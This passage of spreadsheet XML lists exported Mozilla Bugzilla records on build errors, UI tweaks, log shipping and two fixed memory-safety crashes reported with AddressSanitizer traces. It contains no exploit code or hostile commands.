          <t>addons.mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J3874" t="inlineStr">
        <is>
          <t>Add-on Builder</t>
        </is>
      </c>
      <c r="K3874" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3874" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3874" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3874" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3874" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3874" t="inlineStr">
        <is>
          <t>[ftw]</t>
        </is>
      </c>
      <c r="Q3874" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3874" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S3874" t="inlineStr">
        <is>
          <t>Builder 0.9</t>
        </is>
      </c>
      <c r="T3874" t="n">
        <v>1</v>
      </c>
      <c r="U3874" t="n">
        <v>0</v>
      </c>
      <c r="V3874" t="n">
        <v>3</v>
      </c>
      <c r="W3874" t="inlineStr">
        <is>
          <t>Traceback (most recent call last):
  File "/data/amo_python/www/builder.preview/flightdeck/vendor/lib/python/django/core/handlers/base.py", line 106, in get_response
    response = middleware_method(request, e)
  File "/data/amo_python/www/builder.preview/flightdeck/vendor/src/commonware/commonware/middleware.py", line 69, in process_exception
    request.POST = request.POST.copy()
  File "/data/amo_python/www/builder.preview/flightdeck/vendor/lib/python/django/core/handlers/wsgi.py", line 171, in _get_post
    self._load_post_and_files()
  File "/data/amo_python/www/builder.preview/flightdeck/vendor/lib/python/django/core/handlers/wsgi.py", line 137, in _load_post_and_files
    self._post, self._files = self.parse_file_upload(self.META, self.environ['wsgi.input'])
  File "/data/amo_python/www/builder.preview/flightdeck/vendor/lib/python/django/http/__init__.py", line 123, in parse_file_upload
    parser = MultiPartParser(META, post_data, self.upload_handlers, self.encoding)
  File "/data/amo_python/www/builder.preview/flightdeck/vendor/lib/python/django/http/multipartparser.py", line 65, in __init__
    raise MultiPartParserError('Invalid boundary in multipart: %s' % boundary)
MultiPartParserError: Invalid boundary in multipart: None</t>
        </is>
      </c>
      <c r="X3874" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3875">
      <c r="A3875" t="n">
        <v>1155071</v>
      </c>
      <c r="B3875" t="inlineStr">
        <is>
          <t>2015-04-16 00:14:40 -0700</t>
        </is>
      </c>
      <c r="C3875" t="inlineStr">
        <is>
          <t>Configure socorro on stage / new infra on AWS to ship syslog</t>
        </is>
      </c>
      <c r="D3875" t="inlineStr">
        <is>
          <t>2015-05-19 13:15:14 -0700</t>
        </is>
      </c>
      <c r="E3875" t="n">
        <v>1</v>
      </c>
      <c r="F3875" t="n">
        <v>1</v>
      </c>
      <c r="G3875" t="n">
        <v>4</v>
      </c>
      <c r="H3875" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3875" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J3875" t="inlineStr">
        <is>
          <t>Infra</t>
        </is>
      </c>
      <c r="K3875" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3875" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3875" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3875" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3875" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3875" t="inlineStr"/>
      <c r="Q3875" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3875" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3875" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3875" t="n">
        <v>1</v>
      </c>
      <c r="U3875" t="n">
        <v>0</v>
      </c>
      <c r="V3875" t="n">
        <v>3</v>
      </c>
      <c r="W3875" t="inlineStr">
        <is>
          <t>From bug 1155044
We've got log shipping to ELK setup on our AWS account, and we can setup rsyslog shipment of logs to:
logshipper.mocotoolsprod.net UDP 1514 or TCP 1514.  (TCP is not recommended).
We'll want to talk about facilities we'll use for some things, and get tagging of the app-env in log shipments from apps.
An example /etc/rsyslog.d/30-shipem.conf file that would allow rsyslog to ship to this logstash instance:  https://pastebin.mozilla.org/8830279
We can even specifically ship things with logger:
/usr/bin/logger -s -t "app=socorro-collector-staging" -p ${LOG_FACILITY}.info</t>
        </is>
      </c>
      <c r="X3875" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3876">
      <c r="A3876" t="n">
        <v>186778</v>
      </c>
      <c r="B3876" t="inlineStr">
        <is>
          <t>2002-12-25 16:39:19 -0800</t>
        </is>
      </c>
      <c r="C3876" t="inlineStr">
        <is>
          <t>Define QT_NO_DEBUG for --disable-debug to prevent qt build failure because QT Headers define DEBUG</t>
        </is>
      </c>
      <c r="D3876" t="inlineStr">
        <is>
          <t>2004-11-22 17:25:08 -0800</t>
        </is>
      </c>
      <c r="E3876" t="n">
        <v>1</v>
      </c>
      <c r="F3876" t="n">
        <v>1</v>
      </c>
      <c r="G3876" t="n">
        <v>2</v>
      </c>
      <c r="H3876" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3876" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J3876" t="inlineStr">
        <is>
          <t>Build Config</t>
        </is>
      </c>
      <c r="K3876" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3876" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3876" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3876" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3876" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3876" t="inlineStr"/>
      <c r="Q3876" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3876" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3876" t="inlineStr">
        <is>
          <t>mozilla1.3beta</t>
        </is>
      </c>
      <c r="T3876" t="n">
        <v>1</v>
      </c>
      <c r="U3876" t="n">
        <v>0</v>
      </c>
      <c r="V3876" t="n">
        <v>5</v>
      </c>
      <c r="W3876" t="inlineStr">
        <is>
          <t>nsDeviceContextSpecFactoryQT.cpp: In method
`nsDeviceContextSpecFactoryQT::nsDeviceContextSpecFactoryQT ()':
nsDeviceContextSpecFactoryQT.cpp:62: `mID' undeclared (first use this
function)
nsDeviceContextSpecFactoryQT.cpp:62: (Each undeclared identifier is
reported only once for each function it appears in.)
make[6]: *** [nsDeviceContextSpecFactoryQT.o] Error 1
make[6]: Leaving directory `/builds/qt/mozilla/gfx/src/qt'
make[5]: *** [libs] Error 2
make[5]: Leaving directory `/builds/qt/mozilla/gfx/src'
make[4]: *** [libs] Error 2
make[4]: Leaving directory `/builds/qt/mozilla/gfx'
make[3]: *** [tier_9] Error 2
make[3]: Leaving directory `/builds/qt/mozilla'
make[2]: *** [default] Error 2
make[2]: Leaving directory `/builds/qt/mozilla'
make[1]: *** [build] Error 2
make[1]: Leaving directory `/builds/qt/mozilla'
make: *** [build] Error 2
smontagu and hendikins reported this and i reproduced it too. biesi and i
tracked it down to nsRegionQT.h including qregion.h which eventually includes
qglobal.h which conditionally defines define DEBUG:
#if !defined(QT_NO_DEBUG) &amp;&amp; !defined(QT_DEBUG)
#  define QT_DEBUG                              // display debug messages
#  if !defined(QT_NO_COMPAT)                    // compatibility with Qt 2
#    if !defined(NO_DEBUG) &amp;&amp; !defined(DEBUG)
#      if !defined(Q_OS_MACX)                   // clash with MacOS X headers
#        define DEBUG</t>
        </is>
      </c>
      <c r="X3876" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3877">
      <c r="A3877" t="n">
        <v>1356271</v>
      </c>
      <c r="B3877" t="inlineStr">
        <is>
          <t>2017-04-13 08:50:04 -0700</t>
        </is>
      </c>
      <c r="C3877" t="inlineStr">
        <is>
          <t>add a test to measure how many layout flushes it takes for a simple location bar search</t>
        </is>
      </c>
      <c r="D3877" t="inlineStr">
        <is>
          <t>2017-08-16 04:36:33 -0700</t>
        </is>
      </c>
      <c r="E3877" t="n">
        <v>1</v>
      </c>
      <c r="F3877" t="n">
        <v>1</v>
      </c>
      <c r="G3877" t="n">
        <v>2</v>
      </c>
      <c r="H3877" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3877" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3877" t="inlineStr">
        <is>
          <t>Search</t>
        </is>
      </c>
      <c r="K3877" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3877" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3877" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3877" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3877" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3877" t="inlineStr">
        <is>
          <t>[photon-performance] [fxsearch]</t>
        </is>
      </c>
      <c r="Q3877" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3877" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3877" t="inlineStr">
        <is>
          <t>Firefox 56</t>
        </is>
      </c>
      <c r="T3877" t="n">
        <v>1</v>
      </c>
      <c r="U3877" t="n">
        <v>0</v>
      </c>
      <c r="V3877" t="n">
        <v>51</v>
      </c>
      <c r="W3877" t="inlineStr">
        <is>
          <t>(Marco Bonardo [::mak] from bug 1353563 comment #12)
&gt; r=me with at least a bug filed to add a test measuring flushes for a simple
&gt; location bar search. It should be trivial using
&gt; promiseAutocompleteResultPopup</t>
        </is>
      </c>
      <c r="X3877" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3878">
      <c r="A3878" t="n">
        <v>137636</v>
      </c>
      <c r="B3878" t="inlineStr">
        <is>
          <t>2002-04-15 16:28:38 -0700</t>
        </is>
      </c>
      <c r="C3878" t="inlineStr">
        <is>
          <t>should not prompt to rebuild the keyword cache after a keyword description change</t>
        </is>
      </c>
      <c r="D3878" t="inlineStr">
        <is>
          <t>2008-02-05 14:42:09 -0800</t>
        </is>
      </c>
      <c r="E3878" t="n">
        <v>1</v>
      </c>
      <c r="F3878" t="n">
        <v>1</v>
      </c>
      <c r="G3878" t="n">
        <v>4</v>
      </c>
      <c r="H3878" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3878" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3878" t="inlineStr">
        <is>
          <t>Administration</t>
        </is>
      </c>
      <c r="K3878" t="inlineStr">
        <is>
          <t>2.15</t>
        </is>
      </c>
      <c r="L3878" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3878" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3878" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3878" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3878" t="inlineStr">
        <is>
          <t>[blocker will fix]</t>
        </is>
      </c>
      <c r="Q3878" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3878" t="inlineStr">
        <is>
          <t>minor</t>
        </is>
      </c>
      <c r="S3878" t="inlineStr">
        <is>
          <t>Bugzilla 3.2</t>
        </is>
      </c>
      <c r="T3878" t="n">
        <v>1</v>
      </c>
      <c r="U3878" t="n">
        <v>0</v>
      </c>
      <c r="V3878" t="n">
        <v>6</v>
      </c>
      <c r="W3878" t="inlineStr">
        <is>
          <t>When I make a change to a keyword description (not the keyword itself) I am
prompted to rebuild the keyword cache using sanitycheck.cgi. Since I haven't
changed the actual keyword there should be no need to prompt for rebuilding the
cache. 
On large installations like bmo running sanitycheck.cgi. takes a long time and
slows everyone to a crawl while it's running. We should avoid asking the
administrator to do something unless it is really necessary.</t>
        </is>
      </c>
      <c r="X3878" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3879">
      <c r="A3879" t="n">
        <v>897167</v>
      </c>
      <c r="B3879" t="inlineStr">
        <is>
          <t>2013-07-23 11:51:25 -0700</t>
        </is>
      </c>
      <c r="C3879" t="inlineStr">
        <is>
          <t>Tag Cloud Page</t>
        </is>
      </c>
      <c r="D3879" t="inlineStr">
        <is>
          <t>2021-09-21 05:19:16 -0700</t>
        </is>
      </c>
      <c r="E3879" t="n">
        <v>1</v>
      </c>
      <c r="F3879" t="n">
        <v>1</v>
      </c>
      <c r="G3879" t="n">
        <v>6</v>
      </c>
      <c r="H3879" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3879" t="inlineStr">
        <is>
          <t>Webtools Graveyard</t>
        </is>
      </c>
      <c r="J3879" t="inlineStr">
        <is>
          <t>Air Mozilla</t>
        </is>
      </c>
      <c r="K3879" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3879" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3879" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3879" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3879" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3879" t="inlineStr">
        <is>
          <t>cm2</t>
        </is>
      </c>
      <c r="Q3879" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3879" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3879" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3879" t="n">
        <v>1</v>
      </c>
      <c r="U3879" t="n">
        <v>0</v>
      </c>
      <c r="V3879" t="n">
        <v>10</v>
      </c>
      <c r="W3879" t="inlineStr">
        <is>
          <t>We need a tag cloud to help initiate searches by tag.</t>
        </is>
      </c>
      <c r="X3879" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3880">
      <c r="A3880" t="n">
        <v>1229825</v>
      </c>
      <c r="B3880" t="inlineStr">
        <is>
          <t>2015-12-02 08:54:52 -0800</t>
        </is>
      </c>
      <c r="C3880" t="inlineStr">
        <is>
          <t>AddressSanitizer: heap-buffer-overflow in mozilla::image::Deinterlacer::PropagatePassToDownscaler</t>
        </is>
      </c>
      <c r="D3880" t="inlineStr">
        <is>
          <t>2020-02-28 03:06:17 -0800</t>
        </is>
      </c>
      <c r="E3880" t="n">
        <v>1</v>
      </c>
      <c r="F3880" t="n">
        <v>1</v>
      </c>
      <c r="G3880" t="n">
        <v>3</v>
      </c>
      <c r="H3880" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3880" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3880" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K3880" t="inlineStr">
        <is>
          <t>43 Branch</t>
        </is>
      </c>
      <c r="L3880" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3880" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3880" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3880" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3880" t="inlineStr">
        <is>
          <t>[adv-main44+]</t>
        </is>
      </c>
      <c r="Q3880" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3880" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3880" t="inlineStr">
        <is>
          <t>mozilla46</t>
        </is>
      </c>
      <c r="T3880" t="n">
        <v>1</v>
      </c>
      <c r="U3880" t="n">
        <v>0</v>
      </c>
      <c r="V3880" t="n">
        <v>31</v>
      </c>
      <c r="W3880" t="inlineStr">
        <is>
          <t>Created attachment 8694807
AddressSanitizer: heap-buffer-overflow report
1. http://autojavier.cochesdeocasion.com/
2. AddressSanitizer: heap-buffer-overflow in mozilla::image::Deinterlacer::PropagatePassToDownscaler
Beta/43, Aurora/44, Nightly/45 at least.</t>
        </is>
      </c>
      <c r="X3880" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3881">
      <c r="A3881" t="n">
        <v>1388171</v>
      </c>
      <c r="B3881" t="inlineStr">
        <is>
          <t>2017-08-07 14:46:46 -0700</t>
        </is>
      </c>
      <c r="C3881" t="inlineStr">
        <is>
          <t>Replace Pocket icon in the Library Door-hanger</t>
        </is>
      </c>
      <c r="D3881" t="inlineStr">
        <is>
          <t>2017-08-15 09:37:00 -0700</t>
        </is>
      </c>
      <c r="E3881" t="n">
        <v>1</v>
      </c>
      <c r="F3881" t="n">
        <v>1</v>
      </c>
      <c r="G3881" t="n">
        <v>2</v>
      </c>
      <c r="H3881" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3881" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3881" t="inlineStr">
        <is>
          <t>Menus</t>
        </is>
      </c>
      <c r="K3881" t="inlineStr">
        <is>
          <t>57 Branch</t>
        </is>
      </c>
      <c r="L3881" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3881" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3881" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3881" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3881" t="inlineStr">
        <is>
          <t>[reserve-photon-structure][fixed by bug 1387077]</t>
        </is>
      </c>
      <c r="Q3881" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3881" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3881" t="inlineStr">
        <is>
          <t>Firefox 57</t>
        </is>
      </c>
      <c r="T3881" t="n">
        <v>1</v>
      </c>
      <c r="U3881" t="n">
        <v>0</v>
      </c>
      <c r="V3881" t="n">
        <v>5</v>
      </c>
      <c r="W3881" t="inlineStr">
        <is>
          <t>Created attachment 8894652
pocket-16.svg
The Pocket icon in the Library need to be replaced with the standard Pocket icon.</t>
        </is>
      </c>
      <c r="X3881" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3882">
      <c r="A3882" t="n">
        <v>1261776</v>
      </c>
      <c r="B3882" t="inlineStr">
        <is>
          <t>2016-04-04 02:27:05 -0700</t>
        </is>
      </c>
      <c r="C3882" t="inlineStr">
        <is>
          <t>Service Worker - Buffer overflow in  get()</t>
        </is>
      </c>
      <c r="D3882" t="inlineStr">
        <is>
          <t>2024-05-30 09:15:55 -0700</t>
        </is>
      </c>
      <c r="E3882" t="n">
        <v>1</v>
      </c>
      <c r="F3882" t="n">
        <v>1</v>
      </c>
      <c r="G3882" t="n">
        <v>3</v>
      </c>
      <c r="H3882" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3882" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3882" t="inlineStr">
        <is>
          <t>DOM: Service Workers</t>
        </is>
      </c>
      <c r="K3882" t="inlineStr">
        <is>
          <t>48 Branch</t>
        </is>
      </c>
      <c r="L3882" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3882" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3882" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3882" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3882" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main46+] btpp-active</t>
        </is>
      </c>
      <c r="Q3882" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3882" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3882" t="inlineStr">
        <is>
          <t>mozilla48</t>
        </is>
      </c>
      <c r="T3882" t="n">
        <v>1</v>
      </c>
      <c r="U3882" t="n">
        <v>0</v>
      </c>
      <c r="V3882" t="n">
        <v>26</v>
      </c>
      <c r="W3882" t="inlineStr">
        <is>
          <t>Created attachment 8737721
BOF_Get_Repro.zip
Steps to reproduce:
(unzip BOF_Get_Repro.zip, keep BOF_Get_Repro.js, mainpage.html, svcworker0.js and svcworker2.js in the same folder)
1. Run server side script BOF_Get_Repro.js in Node.js (node BOF_Get_Repro.js ).
2. Enter http://localhost:12345 in Firefox asan build.
3. Asan reports a buffer overflow in get().
Firefox version: 48.0a1 (2016-03-26)
=================================================================
==906==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7f0de0f9ea08 at pc 0x7f0dd8a7fe8e bp 0x7fff962b7550 sp 0x7fff962b7548
READ of size 8 at 0x7f0de0f9ea08 thread T0
    #0 0x7f0dd8a7fe8d in get /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:261
    #1 0x7f0dd8a7fe8d in operator[] /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:555
    #2 0x7f0dd8a7fe8d in Done /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/ServiceWorkerManager.cpp:320
    #3 0x7f0dd8a7fe8d in Done /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/ServiceWorkerManager.cpp:400
    #4 0x7f0dd8a7fe8d in mozilla::dom::workers::ServiceWorkerInstallJob::ContinueAfterInstallEvent(bool) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/ServiceWorkerManager.cpp:1221
    #5 0x7f0dd8ac07d8 in mozilla::dom::workers::ContinueLifecycleRunnable::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/ServiceWorkerManager.cpp:702
    #6 0x7f0dd3113710 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThread.cpp:994
    #7 0x7f0dd318ceba in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/glue/nsThreadUtils.cpp:297
    #8 0x7f0dd3b37d99 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessagePump.cpp:97
    #9 0x7f0dd3a9df9c in RunInternal /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:234
    #10 0x7f0dd3a9df9c in RunHandler /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:227
    #11 0x7f0dd3a9df9c in MessageLoop::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:201
    #12 0x7f0dd904a0c7 in nsBaseAppShell::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/widget/nsBaseAppShell.cpp:156
    #13 0x7f0ddaee9698 in nsAppStartup::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/toolkit/components/startup/nsAppStartup.cpp:281
    #14 0x7f0ddafe7b4a in XREMain::XRE_mainRun() /builds/slave/m-cen-l64-asan-000000000000000/build/src/toolkit/xre/nsAppRunner.cpp:4342
    #15 0x7f0ddafe8db6 in XREMain::XRE_main(int, char**, nsXREAppData const*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/toolkit/xre/nsAppRunner.cpp:4439
    #16 0x7f0ddafe9bfe in XRE_main /builds/slave/m-cen-l64-asan-000000000000000/build/src/toolkit/xre/nsAppRunner.cpp:4545
    #17 0x48a793 in do_main /builds/slave/m-cen-l64-asan-000000000000000/build/src/browser/app/nsBrowserApp.cpp:220
    #18 0x48a793 in main /builds/slave/m-cen-l64-asan-000000000000000/build/src/browser/app/nsBrowserApp.cpp:360
    #19 0x7f0dec489ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
    #20 0x489bcc in _start (/home/parnell/FirefoxBuilds/firefox/firefox+0x489bcc)
0x7f0de0f9ea08 is located 0 bytes to the right of global variable 'nsTArrayHeader::sEmptyHdr' from '/builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/xpcom/build/Unified_cpp_xpcom_build1.cpp' (0x7f0de0f9ea00) of size 8
SUMMARY: AddressSanitizer: global-buffer-overflow /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:261 get
Shadow bytes around the buggy address:
  0x0fe23c1ebcf0: 00 f9 f9 f9 f9 f9 f9 f9 01 f9 f9 f9 f9 f9 f9 f9
  0x0fe23c1ebd00: 01 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9
  0x0fe23c1ebd10: 01 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9
  0x0fe23c1ebd20: 00 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9
  0x0fe23c1ebd30: 04 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9
=&gt;0x0fe23c1ebd40: 00[f9]f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
  0x0fe23c1ebd50: 00 00 00 f9 f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9
  0x0fe23c1ebd60: 01 f9 f9 f9 f9 f9 f9 f9 01 f9 f9 f9 f9 f9 f9 f9
  0x0fe23c1ebd70: 01 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9
  0x0fe23c1ebd80: 01 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9
  0x0fe23c1ebd90: 00 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  F==906==ABORTING</t>
        </is>
      </c>
      <c r="X3882" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3883">
      <c r="A3883" t="n">
        <v>906894</v>
      </c>
      <c r="B3883" t="inlineStr">
        <is>
          <t>2013-08-19 14:35:08 -0700</t>
        </is>
      </c>
      <c r="C3883" t="inlineStr">
        <is>
          <t>[Gallery] Video pause button not centered</t>
        </is>
      </c>
      <c r="D3883" t="inlineStr">
        <is>
          <t>2013-09-04 06:32:01 -0700</t>
        </is>
      </c>
      <c r="E3883" t="n">
        <v>1</v>
      </c>
      <c r="F3883" t="n">
        <v>1</v>
      </c>
      <c r="G3883" t="n">
        <v>6</v>
      </c>
      <c r="H3883" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3883" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J3883" t="inlineStr">
        <is>
          <t>Gaia::Gallery</t>
        </is>
      </c>
      <c r="K3883" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3883" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3883" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N3883" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3883" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3883" t="inlineStr">
        <is>
          <t>helix vsd, HD</t>
        </is>
      </c>
      <c r="Q3883" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3883" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3883" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3883" t="n">
        <v>1</v>
      </c>
      <c r="U3883" t="n">
        <v>0</v>
      </c>
      <c r="V3883" t="n">
        <v>19</v>
      </c>
      <c r="W3883" t="inlineStr">
        <is>
          <t>Hi Pavel, 
Can you adjust the position of the pause icon so it's centered to the button? Thanks</t>
        </is>
      </c>
      <c r="X3883" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3884">
      <c r="A3884" t="n">
        <v>512858</v>
      </c>
      <c r="B3884" t="inlineStr">
        <is>
          <t>2009-08-26 18:19:32 -0700</t>
        </is>
      </c>
      <c r="C3884" t="inlineStr">
        <is>
          <t>KB article: Bookmarks toolbar</t>
        </is>
      </c>
      <c r="D3884" t="inlineStr">
        <is>
          <t>2009-09-22 21:37:29 -0700</t>
        </is>
      </c>
      <c r="E3884" t="n">
        <v>1</v>
      </c>
      <c r="F3884" t="n">
        <v>1</v>
      </c>
      <c r="G3884" t="n">
        <v>5</v>
      </c>
      <c r="H3884" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3884" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J3884" t="inlineStr">
        <is>
          <t>Knowledge Base Articles</t>
        </is>
      </c>
      <c r="K3884" t="inlineStr">
        <is>
